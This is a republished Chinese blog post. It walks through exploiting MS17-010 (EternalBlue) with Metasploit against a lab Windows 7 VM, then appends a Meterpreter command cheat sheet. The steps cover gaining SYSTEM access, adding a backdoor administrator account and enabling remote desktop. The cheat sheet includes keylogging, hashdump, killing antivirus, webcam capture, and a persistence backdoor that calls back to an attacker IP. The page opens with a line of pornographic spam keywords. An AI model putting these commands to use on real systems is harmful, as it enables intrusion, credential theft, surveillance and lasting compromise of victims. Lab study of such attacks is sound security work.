国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

記錄一次永恒之藍(lán)(ms17-010)漏洞攻擊 【后附msf常用命令】

這篇具有很好參考價(jià)值的文章主要介紹了記錄一次永恒之藍(lán)(ms17-010)漏洞攻擊 【后附msf常用命令】。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

漏洞簡(jiǎn)要

永恒之藍(lán)是指2017年4月14日晚,黑客團(tuán)體Shadow Brokers(影子經(jīng)紀(jì)人)公布一大批網(wǎng)絡(luò)攻擊工具,其中包含“永恒之藍(lán)”工具,“永恒之藍(lán)”利用Windows系統(tǒng)的SMB漏洞可以獲取系統(tǒng)最高權(quán)限。5月12日,不法分子通過(guò)改造“永恒之藍(lán)”制作了wannacry勒索病毒,英國(guó)、俄羅斯、整個(gè)歐洲以及中國(guó)國(guó)內(nèi)多個(gè)高校校內(nèi)網(wǎng)、大型企業(yè)內(nèi)網(wǎng)和政府機(jī)構(gòu)專網(wǎng)中招,被勒索支付高額贖金才能解密恢復(fù)文件。
惡意代碼會(huì)掃描開放445文件共享端口的Windows機(jī)器,無(wú)需用戶任何操作,只要開機(jī)上網(wǎng),不法分子就能在電腦和服務(wù)器中植入勒索軟件、遠(yuǎn)程控制木馬、虛擬貨幣挖礦機(jī)等惡意程序。
微軟已于2017 年 發(fā)布MS17-010補(bǔ)丁,修復(fù)了“永恒之藍(lán)”攻擊的系統(tǒng)漏洞,一定要及時(shí)更新Windows系統(tǒng)補(bǔ)丁。

環(huán)境準(zhǔn)備

kali linux、具有永恒之藍(lán)漏洞的win7、win10。
環(huán)境均在VM中進(jìn)行,且在同一網(wǎng)段。

攻擊準(zhǔn)備

  1. 在kali中打開msf工具:msfconsole
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全

  2. 查找有關(guān)永恒之藍(lán)的漏洞:search ms17-010
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    這里可能需要解釋一下msf中的六大模塊:

  • auxiliary
    負(fù)責(zé)執(zhí)行信息收集、掃描、嗅探、指紋識(shí)別、口令猜測(cè)和Dos攻擊等功能的輔助模塊。
  • exploits
    利用系統(tǒng)漏洞進(jìn)行攻擊的動(dòng)作,此模塊對(duì)應(yīng)每一個(gè)具體漏洞的攻擊方法(主動(dòng)、被動(dòng))
  • payloads
    成功exploit之后,真正在目標(biāo)系統(tǒng)執(zhí)行的代碼或指令。分為3種類型的payload,分別是single、stages和stagers。shellcode是特殊的payload,用于拿shell。
    single:all-in-one。完整的payload,這些payload都是一體化的,不需要依賴外部的庫(kù)和包。
    stagers:目標(biāo)計(jì)算機(jī)內(nèi)存有限時(shí),先傳輸一個(gè)較小的payload用于建立連接
    stages:利用stagers建立的連接下載后續(xù)payload
  • encoders
    對(duì)payload進(jìn)行加密,躲避AntiVirus檢查的模塊
  • nops
    提高payload穩(wěn)定性及維持大小。在滲透攻擊構(gòu)造惡意數(shù)據(jù)緩沖區(qū)時(shí),常常要在真正要執(zhí)行的Shellcode之前添加一段空指令區(qū), 這樣當(dāng)觸發(fā)滲透攻擊后跳轉(zhuǎn)執(zhí)行ShellCode時(shí),有一個(gè)較大的安全著陸區(qū),從而避免受到內(nèi)存 地址隨機(jī)化、返回地址計(jì)算偏差等原因造成的ShellCode執(zhí)行失敗,提高滲透攻擊的可靠性。
  • post
    后期滲透模塊。在取得目標(biāo)系統(tǒng)遠(yuǎn)程控制權(quán)后,進(jìn)行一系列的后滲透攻擊動(dòng)作,如獲取敏感信息、跳板攻擊等操作
  1. 收集目標(biāo)機(jī)器的有關(guān)信息并配置:use 0(use后面可以跟編號(hào),也可以跟name)
    show options
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    可以看到靶機(jī)ip并未配置,打開win7,找到其地址:
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    kali ip:
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    并確定兩主機(jī)可以相互ping通。
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    配置靶機(jī)ip:
    set rhosts 192.168.159.128 #大小寫都可以
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    查看配置后的結(jié)果:
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    可見配置成功。
    進(jìn)行漏洞掃描:kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    可見靶機(jī)具有漏洞。

  2. 利用exploit模塊:use 0
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    與上個(gè)模塊一樣,先進(jìn)行有關(guān)配置。
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    配置靶機(jī)ip并查看:
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    配置成功!

開始攻擊

  1. 緊接上步,開始攻擊:run
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    出現(xiàn)meterpreter > 說(shuō)明攻擊成功。
    Meterpreter 是 Metasploit 的一個(gè)擴(kuò)展模塊,可以調(diào)用 Metasploit 的一些功能,對(duì)目標(biāo)系統(tǒng)進(jìn)行更深入的滲透,如獲取屏幕、上傳/下載文件、創(chuàng)建持久后門等。
  2. 利用help命令可以查看功能列表:(這里僅截取部分功能)
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    其中有upload,說(shuō)明可以上傳“一些文件”。
    也有shell功能:
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    可以看到是有管理員權(quán)限的,這就意味著可以創(chuàng)建用戶并提權(quán)。

部分攻擊結(jié)果展示

  1. 查看當(dāng)前權(quán)限:getuid
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    最高權(quán)限

  2. 獲取屏幕截圖:screenshot
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全

  3. 上傳文件
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    去主機(jī)中查看:
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    上傳成功!
    有意思的是linux中的文件路徑是/,而windows中的是\。

  4. 創(chuàng)建新用戶
    進(jìn)入shell,先查看已有用戶:net user
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    創(chuàng)建用戶:net user xiaoming 123 /add
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    創(chuàng)建成功!
    查看其所在組:
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    所在user組。
    進(jìn)行提權(quán)(將其放在管理員組下):net localgroup administrators xiaoming /add
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    提權(quán)成功!

  5. 打開遠(yuǎn)程桌面:run getgui -e
    先確認(rèn)win7設(shè)置:
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    利用win10遠(yuǎn)程桌面連接嘗試(兩者可以相互ping通):
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    失敗。
    打開其遠(yuǎn)程桌面權(quán)限。
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    發(fā)現(xiàn)靶機(jī)選項(xiàng)已經(jīng)改變了。
    利用win10再次嘗試:
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    成功!
    可以利用剛創(chuàng)建的用戶進(jìn)行登錄:
    kali永恒之藍(lán)滲透win10,網(wǎng)絡(luò)安全,linux,web安全
    成功!

部分msf命令

  1. 基本命令
    help # 查看Meterpreter幫助
    background# 返回,把meterpreter后臺(tái)掛起
    bgkill# 殺死一個(gè)背景 meterpreter 腳本
    bglist#提供所有正在運(yùn)行的后臺(tái)腳本的列表
    bgrun#作為一個(gè)后臺(tái)線程運(yùn)行腳本
    channel#顯示活動(dòng)頻道
    sessions -i number # 與會(huì)話進(jìn)行交互,number表示第n個(gè)session,使用session -i 連接到指定序號(hào)的meterpreter會(huì)話已繼續(xù)利用
    sesssions -k number #與會(huì)話進(jìn)行交互
    close# 關(guān)閉通道
    exit# 終止 meterpreter 會(huì)話
    quit# 終止 meterpreter 會(huì)話
    interact id #切換進(jìn)一個(gè)信道
    run#執(zhí)行一個(gè)已有的模塊,這里要說(shuō)的是輸入run后按兩下tab,會(huì)列出所有的已有的腳本,常用的有autoroute,hashdump,arp_scanner,multi_meter_inject
    irb# 進(jìn)入 Ruby 腳本模式
    read# 從通道讀取數(shù)據(jù)
    write# 將數(shù)據(jù)寫入到一個(gè)通道
    runbgrun# 前臺(tái)和后臺(tái)執(zhí)行以后它選定的 meterpreter 腳本
    use# 加載 meterpreter 的擴(kuò)展
    load/use#加載模塊
    Resource#執(zhí)行一個(gè)已有的rc腳本

  2. 文件常用命令
    getwd 或者pwd # 查看當(dāng)前工作目錄
    ls #
    cd
    mkdir lltest2 #只能在當(dāng)前目錄下創(chuàng)建文件夾
    rmdir lltest2 #只能刪除當(dāng)前目錄下文件夾
    getlwd 或者 lpwd #操作攻擊者主機(jī) 查看當(dāng)前目錄
    lcd /tmp #操作攻擊者主機(jī) 切換目錄
    cat c:\lltest\lltestpasswd.txt # 查看文件內(nèi)容
    upload /tmp/hack.txt C:\lltest # 上傳文件到目標(biāo)機(jī)上
    download c:\lltest\lltestpasswd.txt /tmp/ # 下載文件到本機(jī)上
    edit c:\1.txt #編輯或創(chuàng)建文件 沒有的話,會(huì)新建文件

  3. 系統(tǒng)命令
    getsystem #會(huì)自動(dòng)利用各種各樣的系統(tǒng)漏洞來(lái)進(jìn)行權(quán)限提升
    migrate #進(jìn)程id進(jìn)程遷移
    background #把當(dāng)前的會(huì)話設(shè)置為背景,需要的時(shí)候在啟用
    getuid #查看對(duì)方正在運(yùn)行的用戶
    ps #列出所有的進(jìn)程
    getpid #返回運(yùn)行meterpreter的id號(hào)
    sysinfo #產(chǎn)看系統(tǒng)信息和體系結(jié)構(gòu)
    shell #切換到cmd的系統(tǒng)權(quán)限方式
    exit #退出shell會(huì)話返回meterpreter或終止meterpreter
    getdesktop 截取目標(biāo)主機(jī)當(dāng)前桌面會(huì)話窗口
    run webcam -p /var/www #在/var/www目錄監(jiān)控目標(biāo)主機(jī)的攝像頭
    keylog_recorder #使用migrate將會(huì)話遷移至explorer.exe的進(jìn)程空間后記錄鍵盤

  4. 遠(yuǎn)程桌面&截屏
    run getgui -e #開啟遠(yuǎn)程桌面
    run getgui -u user1 -p 123 #添加用戶
    run getgui -f 4444 –e #3389端口轉(zhuǎn)發(fā)到6661
    enumdesktops #查看可用的桌面
    getdesktop #獲取當(dāng)前meterpreter 關(guān)聯(lián)的桌面
    set_desktop #設(shè)置meterpreter關(guān)聯(lián)的桌面 -h查看幫助
    screenshot #截屏
    use espia #或者使用espia模塊截屏 然后輸入screengrab
    run vnc #使用vnc遠(yuǎn)程桌面連接,這方法有點(diǎn)問(wèn)題,上傳了exe但是啟動(dòng)不了

  5. 鍵盤記錄
    keyscan_start #開始鍵盤記錄
    keyscan_dump #導(dǎo)出記錄數(shù)據(jù)
    keyscan_stop #結(jié)束鍵盤記錄

  6. 關(guān)閉殺毒軟件
    run killav //可能導(dǎo)致目標(biāo)機(jī)器藍(lán)屏死機(jī)

  7. 后門植入
    run persistence –h #查看幫助
    run persistence -X -i 5 -p 4444 -r 192.168.1.159
    #-X指定啟動(dòng)的方式為開機(jī)自啟動(dòng);-i反向連接的時(shí)間間隔;–r 指定攻擊者的ip文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-658209.html

到了這里,關(guān)于記錄一次永恒之藍(lán)(ms17-010)漏洞攻擊 【后附msf常用命令】的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)

    永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)

    永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010) 環(huán)境 信息收集 先掃描目標(biāo)靶機(jī)IP 進(jìn)入MSF查看是否存在永恒之藍(lán)的漏洞 攻擊 攻擊機(jī):kali 靶機(jī):Windows Server 2008 對(duì)ip進(jìn)行收集開放什么端口 先掃描目標(biāo)靶機(jī)IP 因?yàn)樵谕粋€(gè)內(nèi)網(wǎng)之中 所以可以使用arp-scan -l 進(jìn)行查詢 知道目標(biāo)靶機(jī)IP(192.168.162.146)來(lái)進(jìn)

    2024年03月25日
    瀏覽(21)
  • 【ms17-010】永恒之藍(lán)漏洞復(fù)現(xiàn)

    【ms17-010】永恒之藍(lán)漏洞復(fù)現(xiàn)

    準(zhǔn)備工作 攻擊機(jī):kali,ip:192.168.56.128 靶機(jī):windows server 2003,ip:192.168.56.132 工具:nmap(掃描)、msf 漏洞利用 首先我們先在攻擊機(jī)上使用nmap掃一下該網(wǎng)段主機(jī)的存活情況 此時(shí)已經(jīng)掃描出來(lái)了,ip為: 192.168.56.132 的主機(jī)開啟,并且顯示了開放的端口號(hào)。 然后我們可以使用:

    2024年01月19日
    瀏覽(20)
  • 永恒之藍(lán)ms17_010漏洞復(fù)現(xiàn)

    永恒之藍(lán)ms17_010漏洞復(fù)現(xiàn)

    攻擊機(jī):Linux kali(IP:192.168.52.132) 靶機(jī):Windows 7(x64)(IP:192.168.52.130) 條件:靶機(jī)防火墻關(guān)閉,兩臺(tái)機(jī)子能夠相互ping通,靶機(jī)445端口開啟(永恒之藍(lán)漏洞就是通過(guò)惡意代碼掃描并攻擊開放445端口的 Windows 主機(jī)) ? 登錄 kali linux,用 nmap 探測(cè)本網(wǎng)段存活主機(jī) nmap 192.168.5

    2024年02月11日
    瀏覽(19)
  • 《MS17-010(永恒之藍(lán))—漏洞復(fù)現(xiàn)及防范》

    《MS17-010(永恒之藍(lán))—漏洞復(fù)現(xiàn)及防范》

    作者: susususuao 免責(zé)聲明:本文僅供學(xué)習(xí)研究,嚴(yán)禁從事非法活動(dòng),任何后果由使用者本人負(fù)責(zé)。 - 永恒之藍(lán) 永恒之藍(lán)(Eternal Blue)是一種利用Windows系統(tǒng)的SMB協(xié)議漏洞來(lái)獲取系統(tǒng)的最高權(quán)限,以此來(lái)控制被入侵的計(jì)算機(jī)。而SMB服務(wù)是一個(gè)協(xié)議名,它能被用于Web連接和客戶端與服

    2024年02月06日
    瀏覽(29)
  • 永恒之藍(lán)漏洞 ms17_010 詳解

    永恒之藍(lán)漏洞 ms17_010 詳解

    永恒之藍(lán)(ms17-010)爆發(fā)于2017年4月14日晚,是一種利用Windows系統(tǒng)的SMB協(xié)議漏洞來(lái)獲取系統(tǒng)的最高權(quán)限,以此來(lái)控制被入侵的計(jì)算機(jī)。甚至于2017年5月12日, 不法分子通過(guò)改造“永恒之藍(lán)”制作了wannacry勒索病毒,使全世界大范圍內(nèi)遭受了該勒索病毒,甚至波及到學(xué)校、大型企

    2024年02月08日
    瀏覽(25)
  • 主機(jī)漏洞利用演示MS17-010(永恒之藍(lán))

    主機(jī)漏洞利用演示MS17-010(永恒之藍(lán))

    ms17-010危害:對(duì)被攻擊方的電腦造成藍(lán)屏! 申明:本篇文章的用意僅做學(xué)習(xí)使用 網(wǎng)絡(luò)搭建環(huán)境: 軟件:Vmware Workstation 17 攻擊機(jī):Kali 靶機(jī)環(huán)境:Windows 7 Nmap軟件的基本功能: 1、主機(jī)發(fā)現(xiàn)(Host Discovery) 2、端口掃描(Port Scanning) 3、版本偵測(cè)(Version Detection) 4、操作系統(tǒng)偵

    2024年02月15日
    瀏覽(27)
  • MS17-010 永恒之藍(lán)漏洞利用方式

    MS17-010 永恒之藍(lán)漏洞利用方式

    Eternal blue永恒之藍(lán)漏洞 windows操作系統(tǒng)漏洞 借助工具M(jìn)etasploit復(fù)現(xiàn)漏洞 利用條件: 1.目標(biāo)計(jì)算機(jī)開啟445端口 2.一般適用計(jì)算機(jī)系統(tǒng) windows7 或windows server2008 R2 攻擊機(jī)器:kali-Linux? 192.168.109.130 目標(biāo)靶機(jī):windows7? 192.168.109.129 1.在黑客機(jī)器中對(duì)目標(biāo)計(jì)算機(jī)進(jìn)行端口的掃描? 發(fā)現(xiàn)目

    2024年02月09日
    瀏覽(24)
  • ms17-010(永恒之藍(lán)) 漏洞復(fù)現(xiàn)與處理

    ms17-010(永恒之藍(lán)) 漏洞復(fù)現(xiàn)與處理

    ms17_010 是一種操作系統(tǒng)漏洞,僅影響 Windows 系統(tǒng)中的 SMBv1 服務(wù)。這個(gè)漏洞是由于 SMBv1 內(nèi)核函數(shù)中的緩沖區(qū)溢出而導(dǎo)致的。攻擊者可以通過(guò)該漏洞控制目標(biāo)系統(tǒng),并執(zhí)行任意代碼。這個(gè)漏洞通過(guò) 445 文件共享端口進(jìn)行利用,一旦攻擊者成功利用該漏洞,就可以在目標(biāo)主機(jī)上植入

    2024年02月09日
    瀏覽(25)
  • MS17-010(永恒之藍(lán))漏洞分析與復(fù)現(xiàn)

    MS17-010(永恒之藍(lán))漏洞分析與復(fù)現(xiàn)

    一、漏洞簡(jiǎn)介 1、永恒之藍(lán)介紹: 永恒之藍(lán)漏洞(MS17-010),它的爆發(fā)源于 WannaCry 勒索病毒的誕生,該病毒是不法分子利用NSA(National Security Agency,美國(guó)國(guó)家安全局)泄露的漏洞 “EternalBlue”(永恒之藍(lán))進(jìn)行改造而成 。勒索病毒的肆虐,儼然是一場(chǎng)全球性互聯(lián)網(wǎng)災(zāi)難,給廣

    2024年02月02日
    瀏覽(22)
  • 永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

    永恒之藍(lán)漏洞復(fù)現(xiàn)(ms17-010)----保姆級(jí)教程

    攻擊機(jī): kali Linux?????????? ? 靶機(jī): win7 x64??? 提示:? 復(fù)現(xiàn)攻擊前請(qǐng)關(guān)閉殺毒軟件 ? 1.復(fù)現(xiàn)第一步按以下操作打開 445端口: 在 \\\"運(yùn)行\(zhòng)\\" 里輸入: regedit 打開注冊(cè)表編輯器????????????????????????????????????????????????????????????????????

    2023年04月08日
    瀏覽(21)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包